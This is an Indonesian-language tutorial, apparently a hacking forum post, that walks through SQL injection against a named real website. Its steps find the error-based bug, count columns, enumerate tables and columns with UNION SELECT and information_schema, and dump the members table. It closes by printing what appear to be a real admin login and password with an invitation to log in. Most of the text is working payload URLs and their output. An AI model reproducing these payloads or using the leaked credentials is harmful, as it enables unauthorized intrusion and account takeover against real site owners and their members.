Target :
http://www.natoleo.com/Content.php?id=14
1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada
http://www.natoleo.com
http://www.natoleo.com/Content.php?id=14’
muncul pesan error: MySQL Error: 1064 (You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near '\' order by a.content_order Asc' at
line 1)
2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai
dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target
kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown
column '6' in 'order clause')
http://adf.ly/J2bRw order by 5--
jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)
3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa
melakukan injection dengan perintah [union all select]. Jangan lupa
tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi
id=-14
http://adf.ly/J2bRw union all select 1,2,3,4,5--
akan muncul "angka ajaib" : 1
4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.
http://adf.ly/J2bRw union all select version(),2,3,4,5--
muncul tulisan :5.0.51a-community
5. Selanjutnya kita akan mencari table-nya dgn perintah
"group_concat(table_name)" pada salah satu angka ajaib dan " from
information_schema.tables where table_schema=database()--" di belakang
angka 5
http://adf.ly/J2bRw union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--
muncul nama-nama table:
ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,arti
cles,categories,category_types,club_statuses,config,content,course_welcome,email
s,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kitead
s_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,ki
teads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kitead
s_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspi
c,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_
lists,package,products,users_group,welcome
6. Selanjutnya kita cari column dari table yg ada hubungannya dengan
user dan password,kali ini kita ambil table "members"sebelumnya kita
convert dulu ke hexa agar dapat dibaca oleh Sql di sini
:http://undana.ac.id/images/upload/test.html : pada ascii text ketik
members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib
1 dan " from information_schema.columns where table_name=0xHexa--" di
akhir URL yaitu 6D656D62657273
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.
http://adf.ly/J2bRw union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--
muncul column:
member_id,member_first_name,member_last_name,member_login,member_password,member
_email,country_id,state_id,member_city,member_zip,member_address1,member_address
2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_pho
ne_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,secu
rity_level_id
kita ambil : member_login,member_password
7. Untuk melihat isi dari kedua column tersebut gunakan perintah
"group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from
NAMATABLE-- pada akhir URL
ganti column1 dengan "member_login" dan column2 dengan
"member_password". 0x3a adalah tanda titik dua ( : ) yang telah
diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil
informasi dari table yang bernama"members"
http://adf.ly/J2bRw union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--
hasilnya akan muncul:
user: wilmarnatoleo
pass: natoleoP@ssword
sekarang tinggal login ke website target..
http://adf.ly/J2bL8